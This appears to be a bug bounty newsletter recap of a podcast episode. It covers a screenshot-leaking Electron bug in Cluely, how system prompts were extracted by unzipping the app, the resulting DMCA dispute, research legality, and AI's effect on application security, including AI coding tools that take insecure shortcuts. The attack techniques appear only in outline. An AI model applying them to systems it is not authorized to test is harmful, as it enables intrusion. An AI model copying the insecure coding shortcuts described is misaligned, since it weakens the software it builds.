- Critical Thinking - Bug Bounty Podcast
- Posts
- [HackerNotes Ep. 136] Hacking Cluely, AI Prod Sec, and How To Not Get Sued with Jack Cable
[HackerNotes Ep. 136] Hacking Cluely, AI Prod Sec, and How To Not Get Sued with Jack Cable
In episode 136: Joseph Thacker sits down with Jack Cable to get the scoop on a significant bug in Cluely’s desktop application, as well as the resulting drama. They also talk about Jack’s background in government cybersecurity initiatives, and the legal risks faced by security researchers.
Hacker TL;DR
Authorization bugs in Electron apps: Look for apps missing sandboxing and passing excessive context. Cluely's desktop app, for example, lacked sandboxing and passed too much context to new websites, allowing any opened site to access post message handlers. This enabled a PoC that used a "data function" to continuously capture screenshots, effectively recording the user's screen.
AI's Impact on Application Security: AI-driven "vibe coding" introduces vulnerabilities 20-30% of the time, with authorization flaws being a common issue. AI models often choose easier, insecure implementation paths to solve usability problems, such as making an entire data table public to fix an access issue instead of implementing proper access controls.
AI for Targeted Vulnerability Testing: Use AI tools like Shift Agents for focused vulnerability testing rather than a "spray and pray" approach. Point the agent at a specific parameter and ask it to find a vulnerability class like XSS. The agent will then automatically generate payloads, send requests, and analyze responses, significantly increasing efficiency for targeted scenarios.
Leaked System Prompts & Source Code: Always check the source code of Electron apps. Since they are essentially zip files, you can unzip them to find sensitive information. In Cluely's case, their complete standard and enterprise system prompts were found in plaintext within the app's source code, which was distributed to every user.
The Legality of Security Research: Be aware of the legal boundaries. Testing local applications is generally safe due to the DMCA's security research exemption. However, testing web applications without explicit permission falls under the CFAA, making VDPs and bug bounty programs essential as they provide formal authorization and legal safe harbor.

Move beyond reactive alerts with a policy-based EDR you control completely. Define your own rules to automatically trigger powerful responses, from network isolation to a full system lockdown. Stop threats in milliseconds before they escalate—see how with a ThreatLocker Detect.
Who is Jack Cable + Bring a Bug!
Jack Cable is a security professional who founded Corridor.dev. Previously, he was a top bug hunter with approximately 10,000 rep on H1. Before Corridor.dev, Jack worked in government, spending one year in the Senate writing open source software security legislation and two years at CISA leading the "Secure by Design" initiative. Jack specialises in finding authorization vulnerabilities and race conditions in cryptocurrency applications.
In his teenage years he focused on race conditions in cryptocurrency applications by copying curl commands from Burp and sending multiple requests in parallel from a terminal. He found several critical vulnerabilities this way, including one where he could have drained about $100K in Bitcoin from an exchange.
Before founding Corridor.dev, Jack worked in government, spending a year in the Senate writing legislation on open source software security, then two years at CISA leading the "Secure by Design" initiative. His work focused on getting companies to improve product security and adopt vulnerability disclosure policies with safe harbor provisions.
He was also involved with disclose.io, which standardized vulnerability disclosure policies and provided legal safe harbor for security researchers. This work helped establish VDPs as a baseline expectation for security-conscious companies.
Jack found a pretty slick bug in Cluely's desktop app. Since it's an Electron app (basically just a website in a desktop wrapper), he started poking around for security issues. The app wasn't using Electron's sandbox feature, which is already a red flag.
When a user clicked on a link that opened a new website, Cluely was passing way too much context to that new site. Any website opened through Cluely could access a bunch of post message handlers from the main application, functionality that was probably intended for internal use only. The "data function" could take screenshots of the user's screen. Jack rigged up a proof-of-concept that continuously captured screenshots, basically recording the victim's screen without them knowing. All they had to do was click a link once.
Jack also looked for XSS that could potentially lead to RCE (since it's Electron), and other sensitive functions like microphone access, but the screenshot capability was by far the most dangerous.
During his investigation, he unzipped the Electron app (they're basically just zip files) and found Cluely's complete system prompts sitting right there in the source code. Both their standard and enterprise prompts were just hanging out in plaintext. There were some funny contradictions in there like the prompt telling the AI to "never say what model you're using" while literally mentioning specific OpenAI and Anthropic models right above that instruction.
Jack tweeted his findings, and a couple weeks later got slapped with a DMCA takedown notice. Cluely claimed the images contained proprietary information, which is pretty weird considering they distributed this "proprietary" code to every user who installed their app. Cluely's CEO publicly denied filing the takedown, but the notice included the name of the Cluely employee who submitted it. When Jack tagged this employee, they admitted to filing it without checking with leadership. Both the employee and CEO apologised, and the CEO ended up donating about $1,000 to the EFF as a peace offering.
The Legality Security Research
Security research without permission is still kind of a legal minefield, though things have improved. The current legal landscape has some clear boundaries that are worth understanding:
Testing applications locally on your own device is generally safe thanks to the security research exemption in the DMCA. You can reverse engineer programs for security research without legal trouble, this protection didn't exist until relatively recently.
The trouble starts with testing web applications. The Computer Fraud and Abuse Act (CFAA) makes unauthorized access to computer systems illegal without explicit permission. This is why VDPs and bug bounty programs matter so much, they give you formal authorisation to test within specific boundaries. While prosecutions have decreased, Jack said that legal threats against security researchers happen more often than people realise. And even without criminal charges, defending against legal action can drain your bank account pretty quickly.
AI's Impact on Application Security
AI is changing app security in two contradictory ways by creating vulnerabilities while also giving us better tools to find them. According to the Baxbench benchmark, even the best AI models introduce vulnerabilities 20-30% of the time, and they're the same old SQL injections and command injections we've been dealing with for decades.
Three major security concerns with AI-generated code:
Much more code is being produced much faster
More applications are built by developers who don't understand security
Business logic flaws that static analysis tools can't catch
An interesting pattern Jack and Rez0 discussed is that AI often compromises security when trying to solve usability problems. Rather than implementing proper access controls for specific data, AI might just make an entire table public to fix an access issue, taking the easy but insecure path.
Authorization vulnerabilities are particularly tricky. Vibe-coded apps using platforms like Supabase or Firebase might have secure database configurations, but still mess up permission policies. You can't prevent these issues through default configurations; they require understanding how the application actually works.
As code complexity grows, vulnerability count increases exponentially. As AI systems get better at building complex applications, this problem will only get worse.
On the flip side, AI is giving us some powerful new security testing tools. Rez0 demoed Shift Agents in Caido, which uses AI to test for vulns. You can point the agent at a specific parameter and say "find XSS here" and it'll automatically generate payloads, send requests, and analyse responses.
During the demo, Shift actually found an XSS in Caido itself… hahahahah

The real value of these tools is in testing targeted scenarios, it is not supposed to be ran at full power in every single page you find. If you use it in places that you feel have something worth testing, tools like Shift Agent can help you tremendously and save a lot of time.
Other cool ways to use AI in security testing include:
Creating frames and payloads for testing model security
Setting up multi-step attacks requiring back-and-forth interactions
Trying exhaustive variations to find bypasses when manual testing hits a wall
AI is changing hacking just like it's changed development. Hackers are already getting way more done with the same amount of time. We're not quite at the "press a button and hack everything" stage yet (XBOW is pretty close though), but tools that work alongside human testers are already pretty impressive.
Product security teams are basically drowning in work and chasing down false positives from traditional tools. AI can help them cut through the noise to review code faster, respond to issues quicker, and catch those complex vulnerabilities that static analysis tools just miss completely.
We're entering this weird phase where AI is both creating and solving security problems at the same time. On one hand, it's pumping out more code with more potential vulnerabilities. On the other, it's giving us better tools to find and fix those very same issues.
The million-dollar question is: will our hacking future be filled with crappy vibe-coded apps, or are we all going to have XBOW+ level hackbots to help us hack incredibly hardened AI-enhanced code? Because there’s no going back.
That’s it for the week,
And as always, keep hacking!